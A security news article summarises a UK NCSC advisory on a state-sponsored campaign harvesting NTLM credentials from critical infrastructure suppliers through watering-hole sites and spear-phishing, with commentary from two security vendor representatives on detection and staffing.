Hostile state actors – from unnamed countries – have been running an attack campaign against multiple companies in the CNI (critical national infrastructure) supply chain, since at least March 2017, according to the UK official National Cyber Security Centre (NCSC). The targeting is focused on engineering and industrial control companies and has involved the harvesting of NTLM credentials via Server Message Block (SMB) using strategic web compromises and spear-phishing.
For the document, visit the NCSC website.
According to the 20-page advice, the attacker carries out a watering hole attack, compromising a website of interest to the target, and adding a link to a resource on the malicious fileserver. Or, the attacker sends a spear-phishing email from a compromised account containing a document of interest (sometimes a known contact of the target). In several instances, stolen CVs have been used.
Once access has been gained on the network, the attacker will pivot between various machines using harvested credentials, penetration testing and network admin tools. In some cases, the actors have also deployed custom malware. The attacker will also use cracked or stolen credentials to access the company’s mail server and harvest the contact list of the compromised user. The compromised mail server may then be used to send spear-phishing emails emanating from the victim to other targets.
Comments
Azeem Aleem, Director – Advanced Cyber Defence Practice EMEA at RSA Security, said: “Protecting our critical infrastructure is a matter of national security. However, cybersecurity is often more complex within these environments. Firstly, it is only in recent years that old manual systems have been ‘digitised’ and connected. For years prior the whole focus has been on physical security, which means these companies are often years behind those in banking and retail, per se.
“My advice would be to face these challenges head on and the only way to do this is by having visibility and context. This means conducting a thorough risk assessment, understanding the dependencies between systems, using threat detection to monitor and alert on attacks, and contextualising results with business context in order to prioritise events.
“Critical infrastructure companies are often dependent on legacy infrastructures with complex dependencies, and little visibility. They are unable to correlate security events to specific business outcomes – a problem we call the ‘Gap of Grief’. Take the recent wave of WannaCry and Petya attacks; the industry was quick to cry ‘patch’, but actually that isn’t always possible, as patching systems without proper testing could actually cause more damage.”
And Piers Wilson, Head of Product Management at a cyber security product company, Huntsman Security, said: “These attacks on national infrastructure should be utterly frightening given the chaos hackers can cause through sabotage and it’s made possible in part because of a lack of qualified security personnel and historic underinvestment. Within two years there will be over 1.5m security jobs unfilled globally, meaning that there simply aren’t enough resources in the UK to cope with the growing threats facing our critical infrastructure. Before the digital era, it was relatively simple to prevent and stop attacks, but now it’s much harder. There’s often no easy way to block all of these potential threats at the perimeter, and trying to do so will just result in security analysts becoming overwhelmed by the sheer volume of probes and false positives that mask real issues.
“Organisations must accept that traditional defences – firewalls, anti-virus etc. are simply not enough and emphasis needs to shift away from just blocking attackers, to intelligent and rapid detection, containment and mitigation as soon as an attack begins. This means having first class, automated threat and security intelligence capabilities that can manage the deluge of potential problems – sorting real threats from the background noise of systems and network operation; freeing up security analysts to deal with the real problems as quickly and efficiently as possible. In the digital age, everyone – from the government and critical infrastructure organisations to businesses and charities – needs to accept that they can’t stop every attack at the boundary. Shifting focus will help to keep them and the rest of the UK safe.”
